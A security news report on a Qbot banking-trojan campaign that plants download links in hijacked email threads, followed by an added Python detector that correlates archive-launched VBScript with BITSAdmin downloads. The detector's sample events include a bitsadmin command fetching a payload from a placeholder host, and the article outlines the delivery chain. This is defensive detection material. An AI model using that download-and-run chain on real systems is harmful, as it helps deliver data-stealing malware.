Distributors of the Qbot banking trojan, known since 2009, have launched another email campaign, this time with some innovations.
Experts from the special operations team of the American company JASK established that intruders are now disguising malicious messages by using existing email correspondence. A hyperlink to download the trojan for Windows is inserted into genuine replies to emails that the potential victim has already sent. According to the JASK notification, the email is embedded in an existing email thread. This lulls the target's vigilance and bypasses spam protection.
“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview.
He also added that the aim of such attacks is to steal confidential financial information, including bank account credentials.
Infection proceeds as follows. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a Microsoft Visual Basic Scripting Edition (VBScript) file in a compressed ZIP archive. If this archive is opened, the attack starts the legitimate Windows utility BITSAdmin. This, in turn, leads to the activation of Wscript.exe, another Windows utility, which is used to download the Qbot malware «august.png» from the attackers' server.
This trick is now being used to deliver the long-lived trojan Qbot, also known as QakBot and Pinkslipbot. The trojan, which specializes in stealing data for access to bank accounts, has been serving cybercriminals for more than 10 years. Its popularity is helped by its ability to replicate through removable shared media devices, and by polymorphism: constant change of the program code that allows it to bypass antivirus protection.
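The delivery chain described above leaves a recognisable trail in process telemetry: a script host running VBScript out of an archive's temporary folder, and BITSAdmin fetching a remote file. The following is an added example, not code from JASK or the original article, that correlates those two stages per host. The event field names, hosts, paths and URLs are constructed for illustration, and the archive temp-folder patterns are assumptions about typical extraction paths.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events; field names are hypothetical and the
# hosts, paths and URLs are placeholders, not indicators from the report.
EVENTS = [
    {"ts": "2019-04-01T09:14:02", "host": "WS-017", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\amy\AppData\Local\Temp\Temp1_invoice.zip\invoice.vbs"'},
    {"ts": "2019-04-01T09:14:05", "host": "WS-017", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job1 /download http://payload.example/august.png C:\Users\amy\AppData\Local\Temp\august.png"},
    {"ts": "2019-04-01T10:30:00", "host": "SRV-02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer upd /download https://updates.example/agent.msi C:\ProgramData\agent.msi"},
    {"ts": "2019-04-01T11:00:00", "host": "WS-044", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Scripts\logon.vbs"'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Assumed temp folders used when a script is opened from inside an archive:
# Explorer (Temp1_*.zip), 7-Zip (7zO*), WinRAR (Rar$*).
ARCHIVE_SCRIPT = re.compile(r'\\(temp1_[^\\]*\.zip|7zo[^\\]*|rar\$[^\\]*)\\[^\\"]+\.(vbs|vbe)\b', re.I)
# BITSAdmin job that pulls a remote URL.
BITS_URL = re.compile(r"/(transfer|addfile)\b.*?(https?://\S+)", re.I)
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".bmp")

def classify(ev):
    """Return (stage, url) if the event matches a stage of the chain, else None."""
    name = ev["image"].lower().rsplit("\\", 1)[-1]
    if name in SCRIPT_HOSTS and ARCHIVE_SCRIPT.search(ev["cmd"]):
        return ("script_from_archive", None)
    m = BITS_URL.search(ev["cmd"]) if name == "bitsadmin.exe" else None
    return ("bits_download", m.group(2)) if m else None

def detect(events, window=timedelta(minutes=5)):
    """Alert when both stages hit one host within `window`, in either order."""
    last, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = classify(ev)
        if not hit:
            continue
        ts, host = datetime.fromisoformat(ev["ts"]), ev["host"]
        last.setdefault(host, {})[hit[0]] = (ts, hit[1])
        stages = last[host]
        if len(stages) == 2:
            (t1, _), (t2, url) = stages["script_from_archive"], stages["bits_download"]
            if abs(t1 - t2) <= window:  # image_ext flags a payload posing as a picture
                alerts.append({"host": host, "url": url,
                               "image_ext": url.lower().split("?")[0].endswith(IMAGE_EXT)})
    return alerts
```

A BITSAdmin download on its own (the `SRV-02` event) and a script run from a normal path (`WS-044`) do not alert; only the combination on one host within the window does.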
Source: https://threatpost.com